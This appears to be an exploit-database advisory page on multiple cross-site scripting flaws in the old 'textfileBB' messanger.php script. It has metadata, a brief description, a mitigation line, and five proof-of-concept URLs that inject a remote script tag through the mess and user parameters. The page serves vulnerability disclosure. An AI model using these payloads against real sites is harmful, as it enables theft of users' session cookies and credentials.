header-logo
Suggest Exploit
vendor:
textfileBB
by:
SecurityFocus
7.5
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: textfileBB
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Cross-Site Scripting Vulnerabilities in ‘textfileBB’ Application

The 'textfileBB' application is prone to multiple cross-site scripting vulnerabilities due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

Mitigation:

Input validation and output encoding should be used to prevent XSS attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/17029/info

The 'textfileBB' application is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 

An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

http://www.example.com/messanger.php?mess=%3Cscript%20src=http://www.example.com/xss.js%3E%3C/script%3E


http://www.example.com/messanger.php?p=MSN&user=%3Cscript%0src=http://www.example.com/xss.js%3E%3C/script%3E


http://www.example.com/messanger.php?p=YIM&user=%3Cscript%0src=http://www.example.com/xss.js%3E%3C/script%3E


http://www.example.com/messanger.php?p=ICQ&user=%3Cscript%0src=http://www.example.com/xss.js%3E%3C/script%3E


http://www.example.com/messanger.php?p=AIM&user=%22%3E%3C/head%3E%3Cbody%3E%3Cscript20src=http://www.example.com/xss.js%3E%3C/body%3E%3C/html%3E